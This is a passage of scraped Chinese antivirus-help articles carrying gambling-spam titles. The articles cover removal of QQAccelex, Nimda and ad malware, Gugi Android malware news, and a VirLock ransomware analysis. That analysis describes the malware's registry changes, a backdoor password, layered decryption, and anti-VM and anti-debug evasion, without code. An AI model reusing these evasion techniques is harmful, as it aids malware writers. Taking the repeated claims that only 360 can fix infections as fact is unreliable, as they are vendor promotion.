常开文件防护,这样可以在您计算机的文件发生变动的时候,自动保护您的文件,发现病毒会立刻弹窗告知,这在您经常复制他人的文件到您的计算机的时候非常有用,因为他人的文件可能附带病毒,文件监控可有效预防;</p><p>c ) 如果杀毒软件弹出窗口告知您有此类 acad 病毒,您可以通过病毒文件的使用情况来决定是否需要来一次全盘扫描。如果这个文件您发现是您一直使用的图纸目录中的,那么这个病毒可能感染您计算机有一阵子了,这时候就要全盘扫描;如果您发现这个文件是您刚刚从他人哪里拷贝来的,这可能是我们及时的杀掉了他人的病毒,防止了感染您的计算机,在这种情况下,您可以无需全盘扫描。</p> [病毒漏洞]中了QQaccelex.exe木马病毒怎么办 QQAccelex.exe病毒文件反复生成出现怎么解决-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/108665_1.html 西西 病毒漏洞 2016/9/26 16:04:56 <p><strong>中了QQaccelex.exe木马病毒怎么办,QQAccelex.exe病毒文件反复生成出现怎么解决</strong>。最近不少用户发现QQAccelex.exe病毒文件反复生成出现问题,不知道该怎么办,强行关机等都没有办法有效的解决这个问题,小编给大家推荐一下解决这个问题的方法。</p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a>&nbsp;&nbsp;</p><p>安全卫士收到多个用户反馈,C:\\Users\\XXX\\AppData\\Roaming\\Tencent路径下反复生成一个叫QQAccelex.exe的文件,如截图所示。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768262476392.jpg" title="t01bb5a639096bca1c4.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768682554532.jpg" title="t015daa330a25befddd.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14748768861371579.jpg" title="t016c99500b37977b1d.jpg"/></p><p><br/></p><p>经分析,该程序为伪装的QQ程序,实际上是一个流氓软件。安全卫士可以清除,但系统中还存在驱动木马导致反复生成。</p><p>建议中招用户使用安全卫士-系统急救箱,勾选强力模式扫描,重启电脑再看下。</p><p>后续有什么问题,请关注我们。</p> [病毒漏洞]电脑中了病毒所有文件都多了三个文件是什么原因以及解决办法-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/108459_1.html 西西 病毒漏洞 2016/9/23 17:35:51 <p><strong>电脑中了病毒所有文件都多了三个文件是什么原因以及解决办法</strong>,最近不少人的电脑中了不知道是什么怎么回事,突然间就多了三个文件,所有的图片都没有办法正常打开,这一直很困扰着人们。在这里小编告诉你,是什么原因让你的电脑多了三个文件。</p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank" textvalue="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank" textvalue="http://www.pjyuanjian.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank" textvalue="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14746252539472624.jpg"/></p><h3><strong>电脑中了病毒所有文件都多了三个文件是什么原因?</strong></h3><p>其实就是尼姆达病毒(Nimda),它是是典型的蠕虫病毒,病毒由JavaScript脚本语言编写,病毒通过email、共享网络资源、IIS服务器、网页浏览传播,修改本地驱动器上的.htm,.html和.asp文件。此病毒可以使IE和Outlook Express加载产生readme.eml病毒文件。该文件将尼姆达蠕虫作为附件,不需要拆开或运行这个附件病毒就被执行。</p><h3><strong>尼姆达病毒解决办法</strong></h3><p>没有网络局域网的企业级用户,没有网络版的反病毒(杀毒软件),清除作操方法: 热启动,结束此蠕虫病毒的进程。 在系统的temp文件目录下删除病毒文件。 使用无毒的 riched20.dll(约100k)文件替换染毒的同名的riched20.dll文件(57344字节) 将系统目录下的load.exe文件(57344字节)彻底删除以及windows根目录下的mmc.exe文件;要在各逻辑盘的根目录下查找Admin.DLL文件,如果有Admin.DLL文件的话,删除这些病毒文件,并要查找文件名为Readme.eml的文件,也要删除它。 如果用户使用的是Windows NT或Windows 2000的操作系统的计算机,那么要打开&quot;控制面板&quot;,之后打开&quot;用户和密码&quot;,将Administrator组中guest帐号删除。</p> [网络安全]Gugi恶意软件是什么 安卓用户注意防范Gugi恶意软件-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/106382_1.html 西西 网络安全 2016/9/7 10:58:11 <p><strong>Gugi恶意软件是什么?安卓用户注意防范Gugi恶意软件</strong>最近网络安全人员发现了一款叫Gugi的恶意软件,可以盗取用户信息,快来看看Gugi恶意软件是什么?怎么防护Gugi恶意软件?</p><p>据美国《华尔街日报》最新报道,网络安全研究人员发现了一种能绕开安卓6版本智能手机操作系统安全功能的新型恶意软件,犯罪分子将得以侵入银行应用并盗取信用卡信息。</p><p>跟踪网络威胁活动的卡巴斯基实验室称,这种恶意软件通过在真正的手机银行应用和谷歌应用商店(Google Play Store)应用上形成覆盖屏而盗取手机用户的详细信息。该恶意软件攻击安卓操作系统6版本;该版本于2015年末发布,具有旨在阻止这类攻击的安全功能。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-9/14732172885221464.jpg"/></p><p>此次发现的恶意软件是一直攻击安卓操作系统所有版本的“Gugi”木马恶意软件的变种;木马是伪装成合法软件的恶意软件。</p><p>相关人员称,公司在今年6月检测到Gugi恶意软件的这一变种,距离首次发现这种恶意软件族已有6个月。这家网络安全公司在周二的新闻稿和网站博文上宣布发现该新型恶意软件。</p><p>Gugi恶意软件通常通过鼓动用户点击链接的短信息而感染智能手机,主要盗取短消息,因为很多银行向用户发送短消息,作为第二种交易认证手段。</p> [病毒漏洞]360安全卫士可以查杀敲诈者病毒吗 敲诈者病毒破坏的文件如何恢复-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/82708_1.html 西西 病毒漏洞 2016/3/21 9:41:03 <p>最近有不少用户反映说电脑中病毒了,电脑上的文档、图片等文件被加密打不开了,如果您也遇到了这种情况的话,那么非常不幸的告诉,您中了敲诈者病毒了!敲诈者病毒是什么?360安全卫士可以查杀敲诈者病毒吗?敲诈者病毒破坏的文件怎么恢复?下面西西就来告诉大家!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士西西专区:</strong></span><a href="http://m.cr173.com/k/360safe" target="_blank" textvalue="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手机卫士2016版:</strong></span><a href="http://m.cr173.com/x/10818" target="_blank" textvalue="http://m.cr173.com/x/10818">http://m.cr173.com/x/10818</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手机助手最新版:</strong></span><a href="http://m.cr173.com/x/41712" target="_blank" textvalue="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><h3>敲诈者病毒是什么?</h3><p>西西此前其实为大家带来过一篇电脑中所有文件都变成MP3格式,其实那就是敲诈者病毒干的!</p><p>敲诈者病毒目前主要有VirLock和CTB-Locker两种,两种病毒均是敲诈比特币的。</p><p>VirLock:自定义加密算法,360是目前唯一可以查杀修复感染文件的安全软件</p><p>CTB-Locker:使用RSA加密算法,敲诈弹窗里有RSA字样,RSA加密是目前互联网最主流的加密算法,目前全球所有安全软件均无法通过查杀进行破解,都是只能在打开病毒文件前进行防御而已,所以已经不幸中毒的只能指望之前的备份,大家对于此病毒主要还是要做好平时的备份。另外国外一个安全网站可以部分提供破解,大家可以尝试一下,不过不要抱太大希望。</p><h3>360安全卫士可以查杀吗?</h3><p>根据在线杀毒平台VirusTotal扫描,目前国内只有360杀毒和安全卫士能够查杀拦截最新的敲诈者病毒。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士2016版:</strong></span><a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank" textvalue="http://www.pjyuanjian.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a></p><p>敲诈者病毒花招频出,包括邮件发送带毒附件,利用网站挂马,其传播渠道越来越多。</p><p>暗藏敲诈者病毒的英文邮件,附件带有payment字样,解压缩后出现恶意脚本,双击打开就会中招:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250173632841.jpg"/></p><p>另外,黑客还利用部分网站漏洞(包括游戏、新闻等主流网站),把恶意脚本植入网页中,当有人访问带有恶意代码的网页时,电脑就会自动下载并执行病毒。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250315063123.jpg"/></p><p>如果电脑感染敲诈者病毒,文档、图片、视频等重要资料会被病毒进行高强度加密。如果没有病毒制作者手里的私钥,那么根本无法恢复原文件。因为如果要破解加密的话,普通电脑花几万年时间也不够。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250456063017.jpg"/></p><p>根据VirusTotal(谷歌旗下的在线杀毒扫描平台)检测,目前仅有McAfee和360能够检测最新的敲诈者病毒,360对该病毒的检测结果是HEUR/QVM07.1.Malware.Gen,这意味着搭载了QVM引擎的360安全卫士和360杀毒都能够防御和查杀该敲诈者病毒。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14585250625883116.jpg"/></p> [防护教程]Windows检测到ip地址冲突怎么办 IP冲突的完美解决方法【Win7+XP】-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/82112_1.html 西西 防护教程 2016/3/13 9:59:57 <p>不知道大家有没有遇到过,电脑用的好好的,突然弹窗提示“windows检测到ip地址冲突”,出现IP冲突的话,有的可能不会影响你正常上网,不过有的确会让你无法正常上网,那么遇到这种IP冲突的情况应该怎么办?本次西西就来为大家带来了ip冲突解决办法,有Win7和XP两种办法,快来看看吧!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士西西专区:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手机卫士最新版本:</strong></span><a href="http://m.cr173.com/x/41712" _src="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><p>如果你的电脑IP冲突的话,会在电脑右下角出现黄色感叹号,或者出现IP冲突的提示。详细如下:</p><p><strong>Win7:</strong></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578362642493009.jpg"/></p><p><strong>XP:</strong></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578362715060651.jpg"/></p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士2016版:</strong></span><a href="http://www.pjyuanjian.com/soft/3188.html" _src="https://pic.cr173.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a></p><h3>解决方案:</h3><p>1、最简单的办法重新启动路由器(部分冲突问题可以解决)。</p><p>2、手动修改IP地址(简单介绍XP系统和WIN7系统):</p><p><span style="font-size: 14px; color: rgb(255, 0, 0);"><strong>【XP系统】</strong></span></p><p>1.右键点击“网上邻居”-&gt;“属性”:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364039977583.jpg"/></p><p>2.打开管理网络连接的窗口,右键点击“本地连接”-&gt;“属性”。在本地连接属性中,双击“Internet 协议(TCP/IP)”选择“Internet 协议行IP地址的设置。可以手动进行设置,若路由器开启DHCP功能,也可以设置为自动获取IP地址与DNS服务器地址,就可以解决IP地址冲突的问题了。</p><p><span style="color: rgb(112, 48, 160);">(注:大部分路由器采用的是192.168.1的IP地址,可以使用192.168.1.2-192.168.1.254之间的地址。也可以通过开始--运行--输入CMD命令,输入ipconfig /all命令即可获取,查看到当前网络信息)</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364123698484.jpg"/></p><p><span style="color: rgb(255, 0, 0); font-size: 14px;"><strong>【Win7系统】</strong></span></p><p>1.开始按钮,选择“控制面板”进入。进入控制面板,选择网络和Internet下面的“查看网络状态和任务”(注:如果没有找到网络和Internet,可能您在控制面板切换查看方式,在左上角查看方式切换为类别即可看到)</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364122429975.jpg"/></p><p>2.在网络共享中心选择“更改适配器设置”</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364129988295.jpg"/></p><p>3.在网络连接页面右键单击你目前的网络连接,选择“属性”</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364127744886.jpg"/></p><p>4.在网络属性页面选择“internet协议版本4”,然后点击“属性”。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364131760083.jpg"/></p><p><span style="color: rgb(112, 48, 160);">(注:大部分路由器采用的是192.168.1的IP地址,可以使用192.168.1.2-192.168.1.254之间的地址。也可以通过开始--运行--输入CMD命令,输入ipconfig /all命令即可获取,查看到当前网络信息)</span></p><p><span style="color: rgb(227, 108, 9); font-size: 14px;"><strong>Win7系统自动分配IP方法:</strong></span></p><p>使用快捷键:【Win+R】组合,打开运行--输入CMD--进入【MSDOS】启动命令提示符!</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14578364132147764.jpg"/></p><p>命令提示框输入ipconfig /renew后回车,系统重新获取新的IP地址成功!(<span style="color: rgb(112, 48, 160);">注:由于小编公司网络就不进行图片演示了,一般会出现成功的提示,运行这个命令一般可以解决哦。</span>)</p> [防护教程]电脑中了BNDeskHomepage.exe病毒怎么办 怎么彻底删除deskhomepage.exe文件-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/81921_1.html 西西 防护教程 2016/3/10 13:46:40 <p>最近有很多用户朋友反应说电脑中了BNDeskHomepage 179-1.exe文件病毒,只要打开英雄联盟,游戏主界面就会卡死,然后后台就会不停的疯狂安装程序,那么怎么删除BNDdeskhomepage-179-1.exe文件呢?中了BNDeskHomepage.exe病毒怎么办呢?下面西西就为教教大家!</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士西西专区:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360手机安全卫士:</strong></span><a href="http://m.cr173.com/x/41712" _src="http://m.cr173.com/x/41712">http://m.cr173.com/x/41712</a></p><h3>BNDeskHomepage.exe病毒是什么?</h3><p>此问题是由于游戏客户端出现挂马情况,木马利用Flash漏洞感染游戏玩家电脑,自动安装多款流氓推广软件,并频繁弹出广告窗口。此次挂马重灾区位于河南,疑似是由于网络劫持导致了游戏被挂马。</p><p>各位河南学校校园网的小伙伴要注意了哦,如果你也出现了这样的情况,一定要注意,千万不要大意。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575894866865431.jpg"/></p><h3>检查病毒方法:</h3><p><span style="color: rgb(255, 0, 0);">BNDeskHomepage 179-1.exe文件位置 &nbsp;../lol/air/</span></p><p><span style="color: rgb(112, 48, 160);">特别说明:此文件为隐藏文件,如果电脑中没有看到,可能是隐藏起来,显示隐藏文件在检查一遍。</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575895644158674.png"/></p><h3>解决办法:</h3><p>其实解决办法很简单,你只需要下载最新的360安全卫士,目前360已经开始解决该病毒了。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士最新版本:</strong></span><a href="http://www.pjyuanjian.com/soft/3188.html" _src="https://pic.cr173.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14575898128755217.jpg"/></p><p><strong>如果你安装最新的360安全卫士还无法解决的话,可以在评论区留言给小编,小编看到了在想办法为大家解决。</strong></p> [防护教程]电脑中毒了所有文件后缀都变成MP3格式怎么办 电脑所有文件变成MP3格式解决办法-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/81608_1.html 西西 防护教程 2016/3/7 15:30:00 <p>最近有很多电脑用户反应说今天打开电脑发现所有文件的后缀都变成了“MP3”格式,而且也打不开,即使改了后缀也没有用,遇到这种情况该怎么办?所有文件后缀都变成MP3格式是中毒了吗?下面西西就来为大家科普一下。</p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士西西专区:</strong></span><a href="http://m.cr173.com/k/360safe" _src="http://m.cr173.com/k/360safe">http://m.cr173.com/k/360safe</a></p><p><span style="color: rgb(255, 0, 0);"><strong>360安全卫士2016版:</strong></span><a href="http://www.pjyuanjian.com/soft/3188.html" _src="http://www.pjyuanjian.com/soft/3188.html">http://www.pjyuanjian.com/soft/3188.html</a></p><p>如果你也遇到了上述的情况,<span style="color: rgb(255, 0, 0);">比如电脑图片、office文件、txt、rar等全被篡改后缀名为“MP3”格式,改回来还是打不开的话,那么西西在这里要告诉其实你中了敲诈者病毒啦。</span></p><h3>敲诈者病毒:</h3><p>敲诈者病毒目前主要有VirLock和CTB-Locker两种,两种病毒均是敲诈比特币的。</p><p>VirLock:自定义加密算法,360是目前唯一可以查杀修复感染文件的安全软件</p><p>CTB-Locker:使用RSA加密算法,敲诈弹窗里有RSA字样,RSA加密是目前互联网最主流的加密算法,目前全球所有安全软件均无法通过查杀进行破解,都是只能在打开病毒文件前进行防御而已,所以已经不幸中毒的只能指望之前的备份,大家对于此病毒主要还是要做好平时的备份。另外国外一个安全网站可以部分提供破解,大家可以尝试一下,不过不要抱太大希望。</p><p>近期360安全中心检测到大量文件被一种叫做VirLock的敲诈病毒感染病毒会全盘遍历硬盘中的可执行文件及文档、图片等文件,并将其加密,锁住用户的windows帐号,并弹框威胁用户付费解密文件。</p><p>此为360安全中心首次截获具有感染能力的敲诈病毒,传播能力较强,具有多态变形能力,危害极大,请用户提高警惕。</p><p>目前使用360全线产品可以完美修复系统中被感染的文件。</p><p><span style="color: rgb(255, 0, 0);"><strong>样本信息:</strong></span></p><p>1.360云安全中心已捕获Virlock相关样本近8万个;</p><p>2.国外最早发现此病毒的为ESET(2014年12月)。目前,360是全球唯一可成功修复Virlock变种感染文件的安全软件。</p><p><span style="color: rgb(112, 48, 160);"><strong>病毒描述:</strong></span></p><p><strong>攻击行为一:感染用户数据文件及可执行文件</strong></p><p>感染文件类型,包括但不限于:</p><p>文档:DOC、XLS、PDF、PPT</p><p>图片:PNG、GIF、BMP、JPG</p><p>压缩文件:RAR、ZIP、7z</p><p>被感染的文件与原文件图标一致,但是被感染文件是一个可执行病毒文件,结构大致如下:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573369653507871.png"/></p><p>病毒会遍历所有的磁盘,网络共享路径。加密感染之后,病毒会记录一个文件列表在%userprofile%\????.txt中(?为随机字母)如下图所示。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573369927337019.png"/></p><p><strong>攻击行为二:加密用户登陆密码</strong></p><p>加密当前用户账户,并创建一个新的账户:</p><p>账户名:Administrator(password:unlockpc)</p><p>密码:unlockpc</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370083752454.png"/></p><p>用户重新登录时,进入的桌面环境为全新的用户环境,包括我的文档,桌面等文件路径均与之前的环境不同。</p><p>如图:用户感染此病毒之后,登录界面会多出一个用户(用户名随机),且都需要密码才可以进入。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370195950269.png"/></p><p><strong>攻击行为三:关闭系统安全功能</strong></p><p>禁用UAC,使用户账户控制功能失效。</p><p>用户帐户控制 (UAC) 可帮助电脑防范黑客或恶意软件的攻击。只要程序要对您的电脑执行重要更改,UAC 就会通知您,并询问您是否许可。</p><p>引用自msdn:http://windows.microsoft.com/zh-cn/windows7/products/features/user-account-control</p><p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA</p><p>攻击行为四:实现自启动</p><p><span style="color: rgb(255, 0, 0);">实现自启动项:</span></p><p>HKCU\software\microsoft\windows\currentversion\run 名称随机</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370472811475.png"/></p><p>会释放文件到%userprofile%中,创建随机文件夹,文件夹设为隐藏属性,以及随机文件名。</p><p><span style="color: rgb(255, 0, 0);">释放文件:</span></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370631952070.png"/></p><p>写入垃圾数据,长度0x200字节(以对抗杀软检测):</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573370775515348.png"/></p><p>使用NTFS系统的权限特性,对文件夹进行锁定,用户无法打开,删除文件夹。</p><p>注:XP Professional中,需要在文件夹选项中关闭“简单文件共享”,才可以看到安全选项卡,XP Home版无此功能。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371079794523.png"/></p><p><strong>攻击行为五:隐藏病毒体文件</strong></p><p>病毒会修改注册表,以隐藏文件扩展名及相关文件:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HideFileExt 1</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden 2</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371361443128.png"/></p><p><strong>攻击行为六:弹出勒索提示</strong></p><p>病毒全盘感染完毕之后,会弹出勒索提示框进行警告,病毒会勒索0.71 BTC(约合人民币1000元)。</p><p>如下图所示:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371491713941.png"/></p><p><span style="color: rgb(112, 48, 160);">以上图片大致中文翻译:</span></p><p>检测到系统中存在未经授权的软件或者盗版软件,根据USC授权,你的系统已经被禁止使用。如果不支付相关费用,你将会被逮捕,根据相关法律法规,你有可能会被判处5年徒刑。<br/>如果支付相关罚款,你的计算机将会在4-5个工作日进行解锁,比特币钱包地址如下:</p><p><span style="color: rgb(227, 108, 9);"><strong>安全建议:</strong></span></p><p>1.不要随意点击或运行未经过确认对方身份的邮件附件。特别注意的是.scr .exe 等可执行文件。</p><p>2.更新电脑中的安全软件,目前360系统急救箱可以检测并修复被感染文件,随后360全线安全产品将支持被感染文件修复。</p><p>3.选择单独硬盘对电脑中重要的数据资料进行日常备份,防止数据被加密等意外状况。</p><p>VirLock技术细节:</p><p><span style="color: rgb(255, 0, 0);">1.恢复原始文件:</span></p><p>由于病毒将原始数据包含在自身之中, 所以病毒首先需要将原始数据解密,然后执行之,然后运行,文件恢复的流程如下:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371658505140.png"/></p><p>解密方式较为复杂,有三层解密。</p><p><span style="color: rgb(0, 176, 80);">第一层解密:</span></p><p>主要是为了解密第二层,解密算法为循环左移操作:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573371878661284.png"/></p><p><span style="color: rgb(0, 176, 80);">第二层解密:</span></p><p>其目的是为了解密第三层的解密代码,解密算法为异或操作。</p><p><span style="color: rgb(0, 176, 80);">第三层解密:</span></p><p>解密原始文件名,原始数据等关键数据。解密方式为异或与循环右移相结合。</p><p>如图:解密出来的原始文件名为2009 &amp;10 015.jpg:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372106611784.png"/></p><p>解密出来的原始数据:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372227953352.png"/></p><p><span style="color: rgb(255, 0, 0);">2.代码对抗</span></p><p><span style="color: rgb(0, 112, 192);">1.对抗虚拟机</span></p><p>病毒采用多态变形技术,从入口开始随机调用API,和虚拟机进行对抗,增加分析难度。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372346069883.png"/></p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372802292646.png"/></p><p><span style="color: rgb(0, 112, 192);">2.对抗静态分析</span></p><p>病毒在解密之后,采用了大量成对的”XCHG EAX,EBX”,使代码易读性降低,增加分析难度:</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573372942616193.png"/></p><p><span style="color: rgb(0, 112, 192);">3.对抗动态分析</span></p><p>在运行的过程中,采用了大量的rdtsc进行时间判断,用于检测是否处于调试状态,如果调试则执行不同分支,增加调试复杂度。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573373098140669.png"/></p><p><span style="color: rgb(0, 112, 192);">4.对抗手动清除</span></p><p>病毒会创建多个进程,且互相看护,如果其中任何一个进程结束,则会重新创建一个新的实例,死而复生,永无休止。</p><p>如图:框中的三个进程互为守护进程。</p><p align="center"><img src="https://pic.cr173.com/up/2016-3/14573373223505674.png"/></p> [网络安全]怎么查看手机号注册过哪些网站?手机号注册查询软件使用教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/80722_1.html 西西 网络安全 2016/2/26 12:47:33 <p>随着信息技术的日益成熟,现在我们在各个网站和论坛注册账号一般都是用手机号来注册,这样做在带来方便快捷的同时,也有不好的地方。如果我们因为某些原因会更换手机号的话,那么我们之前手机号注册的一些网站可能会暴露我们的个人信息,因此查询注销是十分有必要的。那么问题就在于,如果我们注册的网站过多,自己记不住的话,怎么办?小编在这里教大家用一款非常不错的<strong>手机号注册查询软件</strong>来看看自己的手机号有在哪些网站上注册过,这样方便我们进行注销。</p><p>这款软件是一款绿色软件,我们只需要在下载好以后,解压缩文件,就可以使用了<br/></p><h3>使用方法:</h3><p><strong>1、运行软件,输入手机号</strong></p><p><img src="https://pic.cr173.com/up/2016-2/14564631127931654.jpg" title="2016-2-26 13-03-59.jpg"/></p><p><strong>2、点击“Go Go<span style="line-height: 1em;">”按钮开始查询</span></strong></p><p><span style="line-height: 1em;"><img src="https://pic.cr173.com/up/2016-2/14564631502799253.jpg" title="2016-2-26 13-04-13.jpg"/></span></p><p><strong><span style="line-height: 1em;">3、待软件下方的进度条读取走完以后,我们就能查看到输入的手机号在哪些网站上注册过,这样我们就可以有目的性的去进行注销或者更换号码的操作啦.</span></strong></p><p><span style="line-height: 1em;"><img src="https://pic.cr173.com/up/2016-2/14564632634164991.jpg" title="2016-2-26 13-07-32.jpg"/></span></p><p><span style="line-height: 1em;">看完这篇教程以后,你就不再担心这样类似的问题了,对吧。那就赶紧来下载这个非常使用的软件吧!</span></p> [防护教程]把文件放iPC 2016 保险箱中避免勒索病毒的侵袭吧-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/71889_1.html 西西 防护教程 2015/12/29 14:51:28 <p>勒索病毒横行,除了各大防毒软体公司无不卯足全力来想办法破解、阻挡外,各界的网络高手也绞尽脑汁的想办法应对。现在有来自马来西亚的高手,撰写了一套电脑用保险箱的程序《iPC 2016》,让你的重要档案能够先被保护。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525256507.jpg"/></p><p>《iPC 2016》的概念很简单,目前已支勒索软件的加密功能,是无法感染已经加密的档案,而它的想法就是让你先把觉得重要的档案,自己事先加密起来保护着。打开《iPC 2016》之后,它会先要你设定一组密码,设定完成后,《iPC 2016》它运用C槽的空间,模拟出一个虚拟的磁盘槽,只要把你觉得重要的档案往这边放,就可以被《iPC 2016》保护着,以后要取用这些档案也必须要打开《iPC 2016》程序,登入密码后才能打开虚拟磁盘槽取用档案。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525330987.jpg"/></p><p>第一次使用iPC 2016时,毕需要先输入一组密码。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525332192.jpg"/></p><p>设定完成后,就可以进入到程序界面,按下打开的按钮,就可以看到iPC 2016帮你模拟的虚拟磁盘槽。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525487450.jpg"/></p><p>档案放在这边就对啰。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525483046.jpg"/></p><p>虚拟磁盘槽的位置,目前是存放在C。</p><p>刚刚有提到《iPC 2016》它运用C槽的空间,模拟一个虚拟磁盘槽出来,其实它在C槽底下还是一个文件夹的状态,只是显示上是「没有图标、没有名称」的文件夹,在《iPC 2016》没有执行的状态下,甚至无法直接从C槽打开它,可以说是保护的相当严谨。而就算《iPC 2016》因为不明原因遭砍除,其实也不用担心,只要重新下载程序后,</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525427901.jpg"/></p><p>加密文件夹是用个非常隐藏的方式存放在C槽,不仔细看根本找不到。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525495204.jpg"/></p><p>在iPC2016没有执行,或是删除的状态下,这个文件夹是无法开启的。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525526547.jpg"/></p><p>程序可以随时关闭或删除,等到要打开虚拟磁盘槽时,就打开iPC 2016,输入原本设定的密码。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525522143.jpg"/></p><p>这样就可以看到你原本存放在里面的挡案啰。</p><p>但目前《iPC 2016》还是有两个缺点,一个是密码设定完毕后,《iPC 2016》本身没有改变密码的地方,所以使用者设定后,必须要牢记自己的密码、不要忘记。第二个缺点是,虚拟磁盘槽的设定目前预设是只能在C底下,不能转移到其他文件夹,但是档案存放在C槽,其实是有违目前使用者「备份」的概念,再加上现在有不少人C槽其实是SSD,容量空间不足,所以这部分比较可惜。不过真对此两部分,作者Desmond Lee表示会在近期的版本中作更新修正,请各位耐心等候。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2016-1/2016011209525530424.jpg"/></p><p>主界面上的垃圾桶,主要就是一键清空虚拟磁盘槽的功能,要是按下去的话,会跳出一个提示视窗,再按下去就是删除档案了。</p><p>或许有人提到说,与其浪费时间使用这套软件,还不如直接使用Dropbox,当然的,在重要档案不大的状况下,可以使用Dropbox来处理,但是当档案超过5G、10G的时候,Dropbox免费空间又有限,这时候可以直接在硬盘上保护的《iPC 